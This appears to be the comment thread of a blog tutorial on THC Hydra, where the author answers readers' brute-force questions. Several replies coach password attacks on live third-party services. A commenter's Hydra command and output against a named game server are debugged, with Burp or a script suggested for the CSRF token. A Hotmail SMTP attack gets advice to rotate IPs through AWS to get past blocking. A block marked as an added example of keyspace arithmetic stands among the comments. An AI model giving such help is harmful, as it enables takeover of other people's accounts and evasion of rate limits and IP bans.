    I know the username, pin and area. What would the syntax look like in this example (if at all possible) to only bruteforce the password?

  10. Thank you so much for the write up. It’s fantastic! I’ve been looking for a good tutorial on http-post/get-form for hydra and yours is the most detailed I’ve found. I understand the concept 100% now, vs just being a script kiddie and pasting commands you find online (which I was guilty of a couple years ago… but that’s how everyone learns, right?). I’ve been doing lots of CTFs and sometimes get held back by messing up the proper form and would always get errors. Knowing what the placeholders are and their purpose, and breaking down the post/get request from burpsuite or other proxy is what I was missing….

    1. Thanks Lazy Jay for taking the time to leave such a nice comment, it’s always nice to receive feedback.

      If there ever is anything else you would like me to cover in more detail, leave me a comment and I’ll create a tutorial about it.

      Hemp

  11. Hello
    I ran your example but hydra gives this error:
    [ERROR] Compiled without LIBSSH v0.4.x support, module is not available!
    What should I do?
    Thanks

    1. Hi John

      I actually ran into this compiling hydra as well.

      apt-get the libssh packages
      cd into/hydra/dir
      sudo ./configure clean
      sudo ./configure
      sudo make
      sudo make install

      Your hydra should now have libssh support.

      Let me know if you are still having problems.

      hemp

  12. Hello!
    I would like to know how THC Hydra could work with login and password fields that change with each new request?

    Kind regards,
    Thiago

    1. Hi Proodyr

      Thanks for your comment,

      Yes you can bruteforce Teamspeak with hydra.

      Try something like hydra -l superadmin -P PasswordFile.txt -s 9002 -v 192.168.22.139 teamspeak

      but in the newer version, teamspeak has an option to ban your IP after x amount of failed logins.

      hemp

  13. Hello Hemp,

    Really nice article. Appreciate the work you put in. Nice explanations. Maybe you could post some more examples on http-form-post with hydra.

  14. I know the username and password, just testing it out, and it’s saying the first password is the correct one when it’s not; it isn’t even finishing the other password checks.

    hydra -t 4 -V -f -l cracker000 -P C:\Users\joe\Desktop\passwords.txt (IP) https-post-form “/ HTTP/1.1:username=^USER^&password=^PASS^:F=Login failed”

    1. Hi Joe

      Thanks for your comment.

      I do not think the syntax of your command is correct.

      You don’t have an IP address or domain name, plus this in bold is wrong / HTTP/1.1:username=^USER^&password=^PASS^:F=Login failed”.

      If you would like me to help further, please post your captured request in the comments and I can help you structure the command.

      Hemp

  15. Well, this is the full command I type
    hydra -t 4 -V -f -l cracker000 -P “C:\Users\Joe\Desktop\passwords.txt” 69.164.211.252 https-post-form “/game.eoserv.net:username=^USER^&password=^PASS^&Login=Login:F=Login Failed.:H=Cookie: PHPSESSID=jav8tc5rj7iul6ik69fkqd25og; security=low”

    and when it runs this is what it says
    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-22 23:45:10
    [DATA] max 4 tasks per 1 server, overall 4 tasks, 13 login tries (l:1/p:13), ~4 tries per task
    [DATA] attacking http-post-forms://69.164.211.252:443/game.eoserv.net:username=^USER^&password=^PASS^&Login=Login:F=Login Failed.:H=Cookie: PHPSESSID=jav8tc5rj7iul6ik69fkqd25og; security=low
    [ATTEMPT] target 69.164.211.252 - login "cracker000" - pass "password1" - 1 of 13 [child 0] (0/0)
    [ATTEMPT] target 69.164.211.252 - login "cracker000" - pass "methoda2" - 2 of 13 [child 1] (0/0)
    [ATTEMPT] target 69.164.211.252 - login "cracker000" - pass "joe45" - 3 of 13 [child 2] (0/0)
    [ATTEMPT] target 69.164.211.252 - login "cracker000" - pass "jackson32" - 4 of 13 [child 3] (0/0)
    [STATUS] 4.00 tries/min, 4 tries in 00:01h, 9 to do in 00:03h, 4 active
    and it just stays like that

    I lost my account and I’m just trying to get it back but it’s not working

      1. I get this
        POST / HTTP/1.1
        Host: game.eoserv.net
        Connection: close
        Content-Length: 56
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        Origin: https://game.eoserv.net
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Referer: https://game.eoserv.net/
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9
        Cookie: PHPSESSID=5rvktnjqgb2e9qfr4licuremoi

        csrf=1643232762&action=login&username=dfdf&password=dfdf

        1. Hi Joe

          Ok, I think I know what your issue is. Everything you are typing is correct, but there is a CSRF token which probably changes with every password request.

          Hydra can’t do this by itself; you either need to use hydra with burp so that burp can capture the CSRF token, or just use burp on its own. However, if you’re using the community edition of burp the amount of simultaneous threads is limited, so it might take a long time depending on your wordlist.

          Another, third option is to write something yourself; check out the High Security heading on my tutorial on Brute Forcing Web Logins with DVWA. This covers writing a brute force script which collects the CSRF token using Python.

          let me know how you get on??
          Hemp 🙂

  16. hello, I’m trying to recover the password of a very old email of mine, in fact I didn’t insert alternative ways to recover it, email made at the time of messenger with hotmail.it I tried to recover it with: Hydra -s 587 -S -O -V -l [email protected] -p rockyou.txt -t 32 smtp.live.com smtp
    but i don’t get results, right?
    I would like to try an attack without a password list, but let it be generated, how should I go about getting all possible characters?

    1. Hi Filippo

      You’re not going to be able to run Hydra alone against hotmail accounts, they will just block your IP.

      You will have to proxy it through multiple IPs. Then, if one IP gets blocked you have already switched to a new one.

      Just google brute Forcing using AWS.

      In Hydra you can brute force without a password list by using the -x tag. However, this is a lot slower than using a good password list.

      -x MIN:MAX:CHARSET
      MIN = Minimum number of characters
      MAX = Maximum number of characters
      CHARSET = specify a character set (a lowercase, A uppercase, 1 numbers and everything else use the actual character).

      Hope this helps?

      Hemp

        1. Hi Alex

          If you are not using a password list you need to use the -x command, adding the minimum and maximum number of characters and the charset.

          so something like -x 2:5:a will generate passwords from length 2 to 5 with lowercase letters.

          If you need to find out more check out the help in hydra with hydra -x -h.

          Hope this helps.

          Hemp
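How fast the -x search space grows, as an added example that is not part of the original comments: it parses a MIN:MAX:CHARSET spec as described above, counts the candidates, and converts that into days at the 4 tries/min rate from the [STATUS] line quoted earlier in this thread. Function names are hypothetical, and literal characters are assumed not to overlap a selected class.

```python
# Added example: keyspace arithmetic for hydra's -x MIN:MAX:CHARSET option.
# Function names are hypothetical; class sizes follow the description above
# (a = lowercase, A = uppercase, 1 = digits, anything else is a literal).
CLASS_SIZES = {"a": 26, "A": 26, "1": 10}


def parse_x_spec(spec):
    """Split 'MIN:MAX:CHARSET'; the charset itself may contain ':'."""
    parts = spec.split(":", 2)
    if len(parts) != 3 or not parts[2]:
        raise ValueError(f"expected MIN:MAX:CHARSET, got {spec!r}")
    lo, hi = int(parts[0]), int(parts[1])
    if lo < 1 or hi < lo:
        raise ValueError("need 1 <= MIN <= MAX")
    return lo, hi, parts[2]


def alphabet_size(charset):
    """Count distinct symbols; assumes literals do not overlap a class."""
    return sum(CLASS_SIZES.get(ch, 1) for ch in set(charset))


def keyspace(spec):
    """Total candidates = sum of n**k for every length k in MIN..MAX."""
    lo, hi, charset = parse_x_spec(spec)
    n = alphabet_size(charset)
    return sum(n ** k for k in range(lo, hi + 1))


def days_to_exhaust(spec, tries_per_min):
    """Worst-case days to try every candidate at a fixed online rate."""
    return keyspace(spec) / tries_per_min / (60 * 24)


if __name__ == "__main__":
    rate = 4  # tries/min, from the [STATUS] line quoted in this thread
    for spec in ("2:5:a", "8:8:a", "8:8:aA1", "8:12:aA1!"):
        print(f"{spec:<10} {keyspace(spec):>26,} candidates "
              f"{days_to_exhaust(spec, rate):>22,.0f} days")
```

Even the small 2:5:a space takes years to exhaust at that rate, which is why length requirements combined with rate limiting or lockout make online guessing impractical.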

  17. Hi, at the sudo make install part, I just got error 127 saying there is no such file or directory. How can I fix this?

    1. Hi Jay_why5150

      No, hydra can only brute force passwords.

      I think you might be looking for a tool like Netcat, check out my tutorial for Netcat HERE

      Hemp
